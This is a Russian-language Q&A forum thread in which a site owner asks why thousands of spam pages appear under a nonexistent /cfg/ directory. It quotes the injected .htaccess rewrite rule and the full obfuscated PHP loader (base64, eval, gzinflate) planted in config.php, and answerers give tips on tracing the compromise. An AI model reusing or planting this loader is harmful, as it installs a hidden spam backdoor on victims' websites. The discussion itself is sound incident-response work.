Задать вопрос
keslo
@keslo

Как найти на сайте директорию, которая существует, но ее не видно?

Добрый день, господа!
Вопрос в заголовке получился довольно сумбурный. Но... crlz по-всему был какой-то взлом...

Есть сайт - www.macmachine.ru/ Там все работает и открывается. Порядка 20-30 страниц.
Сегодня я заметил, что страниц в индексе Яндекса стало 5000+ О_о
Начал смотреть.
Все новые страницы идут из такой директории www.macmachine.ru/cfg/. Но директории /cfg/ у меня нет на хостинге... да и не должно быть. По всем ссылкам открывается какой-то шлак с рекламой.
Что делать?

ПОСЛЕДНИЕ НОВОСТИ

1. Нашел с htaccess такие строки:

Options +FollowSymlinks
RewriteEngine   on
RewriteRule ^cfg/(.*)$ /manager/includes/config.php/$1 [L] 
RewriteBase /


2. config.php представляет из себя такое:

<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=ce1340daf66134d8ea13d1c9d6828eabd889094arVf/b9pGFP+ZSv0fXi0kmwkMZOrWEmVtRJwmUxIyIJWmNEKuOYM32+fZ54aopX/73rvzV6BkiYYAc3fv87l37+vRjGyxnPITHsMRaF3HXWiH8PJFM3g444mguQPz3k3wox3iNEmPwstiUQkLFkS+LRjO6O6SpwnTSdjhYcgckusdQrcLRh864NyML9rQw18T7vzNRCtjRakk/ZyI2GjOJtb4ozW+1cfWHzfWZDq7GZ/rd23ARZ+FRrNQudWibZYi8BG9YGLIQ8FCYWTat6GmrylHOJmr264wIZHngoFbSBWUpGY6SaK1WrBk9pzFhp5t0Jk+RGwAgq1EFyUOwVnaccLEUSrczhudyJifMNjFGIWLHzN6gb1gXRTZz/FXhBzw7RtsL7BH2UlmP/3Ccx8jQZH9HJ7DKxxaziEqHKsOCoXaXppV4Jc0UOoiSgegyJMcIFbiEZdicHjhUzjjapQ8Xcs9qlBs78Ih0llyQ8a+Grtp6AiPh7U8WJZZUI17qAQ+fCV0Y+Hzz7YPec5upA7u0KBz58sS1cB3o6mUTzAB7Ti2HwyabGhj5rKYxQNYChENul3NLLP6bDq9np2NJlP9ztRoJdfLLNWihbaiOnYcFomOb4eLFMNmACzMl24SFneOF3jUAUwsfjIad4a+h0Mwqtp3amdpaQQmozXUCRyqPU4a+zMv9IShVuQYbc4jNKOD1hti3RpdUy3C8qVnx9JNaWKl+CNAOvaZdXxijdG4udUewYyt6c34ajo+vpqcEq7/GGA4urqyhtPp+aU1upki4PVjiG3RmIk0DqEZsyT1RW6bmM29eMZWzDGATFahdXyeMGKVc2uQQf1V2vZz6rrUFXQp3UxkyceJ9y795BGVcxWkb3poFhbHIVdPzC+1hYw7BcyDtdF470apSPJ5TMEP1hS+SjesgSzd7Zu9T/EnVV52ASgUBgih3dd7JZ8XZXsp/4f02Ms/VGmK5WAA0jskXSAk5n7p+QyMV+9dxt3CwCqxG7nnTPIUFpQKd//gTbbrWn5nCmQxkNEogTKC2Cry+ZwZWqEHOpl2aMNBJpwxkbejmC1mgS2cpaF9v+COrQ5imD+1vhNQ0d728ErQDEqV815jrSIPRQZwyUPk/wV+T33ov337K/ReD3o9fMOHyylaAuq4oe0sWYdqZ8z9AYS849BMG4IUvRuzL7bvzdEPhMTbTBZl/Q2W69heBHYJ3y99YSP1JZ97rsfmA+q9AW1haCdtmMMl/AlnA2+A3cXUlM51eMH6c6+Px/3C5nDN4sAOMTr9hy3x0paaifmFOY2B5TCjFrlY3XQy7G3/Du9XbOWJLXfXKwQKSoks8bNFTZPF4OWLda07bdYSqhrSgXkD2mg7gK9EoNYOVh3C+pxHibpSwo7lwF4VIgeljGpeJR7gt6NNBOoBoDrC7o3olZ3u9PhiYhULa/X4cenPyr6IU9YqUP+56tdhTQwQO6/KhQ2LZd9LqPFLj7eVcOtHGUiLMgMLbqpHMwcF8w0w+b3Q5aWC51enI9nLsNecWK26hSvwIxmTeEfdnDzIErYpM5yVNwfF1WhU079bhCxm/7vWp7CrFd2TglRR5MgmakzNJaLr0gwHhoi9wJD0s4hHRgGQ/xxyn5Lqrwibl5Ju1+GpPw91AVHMHZYkIJYMiF1wkNFL/2vwt0rnXQFTSRMycy2I1pm6Pmb/TOlcqrzH7NbpKTb3848W3UJa+akL9W/1BA8XMP2uBfUxblBsVs5u46kZlmg1qmPV3DaS0rZEqlEdqeYyJH263WbI7rPzb+hrgk7XK3zWVDHr/CaGnBz/k7L4Qb97p7/DG1l1ZqDrqghubfV0Cvo8r8c8o8NUYTtaSnX5WT3kSR3kOf0js3fZQlTgq7vhVp09ypNmK2caMlnW/wI=
  • Вопрос задан
  • 2779 просмотров
Подписаться 2 Оценить Комментировать
Решения вопроса 3
а вы уверены, что эта папка на ВАШЕМ сервере?
как я понял, доступ к сайту у вас есть, и сайт относительно работает(если все страницы сайта вдруг изменились, то смотрите на параметры домена, может это его угнали).
ну а раз доступ есть, то проблема в скриптах скорее всего.
физически, этой папки может и не быть.
Ответ написан
nokla
@nokla
deadbyelpy
@deadbyelpy
веб-шмеб
а что насчет редиректов?
если физически, директории нету, поиск по файлам - "cfg", grep'ом умеете пользоваться?
что-то да гдето заражено, php или htaccess или js скрипты, надо искать. правда еще можно поискать по
"Y2Zn" - это base64 закодированная строка "cfg"
Ответ написан
Комментировать
Пригласить эксперта
Ответы на вопрос 2
То, как вас взломали зхависит от множества факторов.
1. Банальный брутфорс, как админки, так и ftp/sftp
Если у вас есть sftp посмотрите командой last, если ftp, смотрите логи. Если у вас хостинг, запросите хостинг компанию дать вам логи фтп.
2. Использовали сторонний php компонент не разобравшись в нем.
3. Что то делал фрилансер, доступы утекли через него / с помощью него.

UPD: Прикольное название у этой штуки, она себе домой стучится под юзер агентом: SEoDOR-Client
Ответ написан
keslo
@keslo Автор вопроса
Ваше экспертное мнение: каким образом подобный код мог попасть на сайт? И какие меры принять, чтобы это снизить к минимуму?
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы